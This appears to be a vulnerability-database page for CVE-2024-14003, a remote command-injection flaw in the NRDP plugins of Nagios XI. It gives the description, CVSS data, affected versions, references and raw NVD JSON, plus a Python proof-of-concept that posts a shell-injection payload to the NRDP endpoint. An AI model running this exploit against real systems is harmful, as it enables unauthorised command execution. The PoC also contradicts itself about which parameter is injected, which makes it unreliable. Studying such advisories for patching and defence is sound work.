CVE-2024-14003

Description

Nagios XI versions prior to 2024R1.2 are vulnerable to remote code execution (RCE) through its NRDP (Nagios Remote Data Processor) server plugins. Insufficient validation of inbound NRDP request parameters allows crafted input to reach command execution paths, enabling attackers to execute arbitrary commands on the underlying host in the context of the web/Nagios service.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:nagios:nagios_xi:2024:r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:nagios:nagios_xi:2024:r1.0.1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:nagios:nagios_xi:2024:r1.0.2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:nagios:nagios_xi:2024:r1.1:*:*:*:*:*:* - VULNERABLE

Nagios XI < 2024R1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2024-14003 PoC - Nagios XI NRDP Remote Code Execution
# Usage: python3 cve-2024-14003.py <target_ip> <target_port>

import sys
import requests
import argparse

def exploit_nrdp(target_ip, target_port=5661):
    """
    Exploit CVE-2024-14003: RCE via NRDP server plugins in Nagios XI
    """
    url = f"http://{target_ip}:{target_port}/nrdp"
    
    # Malicious payload to execute arbitrary command
    # The vulnerability allows command injection through NRDP request parameters
    payload = {
        'cmd': 'submitresults',
        'host': 'test_host',
        'service': 'test_service',
        # Command injection via service parameter
        'state': '0',
        'output': '$(whoami > /tmp/pwned.txt)'
    }
    
    try:
        print(f"[*] Sending exploit payload to {url}")
        response = requests.post(url, data=payload, timeout=10)
        print(f"[+] Response status: {response.status_code}")
        print(f"[*] Response: {response.text[:200]}")
        
        # Verify if command was executed
        verify_url = f"http://{target_ip}:80/tmp/pwned.txt"
        verify_response = requests.get(verify_url, timeout=10)
        if verify_response.status_code == 200:
            print(f"[!] VULNERABLE! Command output: {verify_response.text.strip()}")
            return True
        else:
            print("[-] Could not verify command execution")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2024-14003 PoC')
    parser.add_argument('target', help='Target IP address')
    parser.add_argument('port', nargs='?', default='5661', help='NRDP port (default: 5661)')
    args = parser.parse_args()
    
    exploit_nrdp(args.target, int(args.port))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-14003
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-14003
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-14003/
[4] VulDB https://vuldb.com/cve/CVE-2024-14003
[5] https://www.nagios.com/changelog/nagios-xi/
[6] https://www.nagios.com/products/security/#nagios-xi
[7] https://www.vulncheck.com/advisories/nagios-xi-rce-via-nrdp-server-plugins

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-14003", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:45.737", "lastModified": "2025-11-06T16:09:37.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios XI versions prior to 2024R1.2 are vulnerable to remote code execution (RCE) through its NRDP (Nagios Remote Data Processor) server plugins. Insufficient validation of inbound NRDP request parameters allows crafted input to reach command execution paths, enabling attackers to execute arbitrary commands on the underlying host in the context of the web/Nagios service."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*", "versionEndExcluding": "2024", "matchCriteriaId": "62CF7BF4-6AAA-443E-93B4-B2F080091C13"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1:*:*:*:*:*:*", "matchCriteriaId": "85F1764D-1DD8-44B0-BF5A-2420CB519A3C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.0.1:*:*:*:*:*:*", "matchCriteriaId": "C1FE1A0B-78D1-4626-A4CD-21B843DA596E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.0.2:*:*:*:*:*:*", "matchCriteriaId": "CCAB888E-F030-4640-9A18-9E423E553308"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1:*:*:*:*:*:*", "matchCriteriaId": "C648B0A4-053C-4884-8A37-4AF03053ED1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1.1:*:*:*:*:*:*", "matchCriteriaId": "893EEA99-0096-4C9F-BA8A-246A3E3F6C15"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1.2:*:*:*:*:*:*", "matchCriteriaId": "A1FDA3F3-DF79-4807-9451-F04B2DB9A2B6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1.3:*:*:*:*:*:*", "matchCriteriaId": "9E055065-35A7-458A-A2DB-26634B97EE7C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1.4:*:*:*:*:*:*", "matchCriteriaId": "76946B2D-093C-4981-8465-5ADBB98C0676"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2024:r1.1.5:*:*:*:*:*:*", "matchCriteriaId": "E9112876-7C61-4A72-8F91-023378E82E6D"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/nagios-xi/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.nagios.com/products/security/#nagios-xi", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/nagios-xi-rce-via-nrdp-server-plugins", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}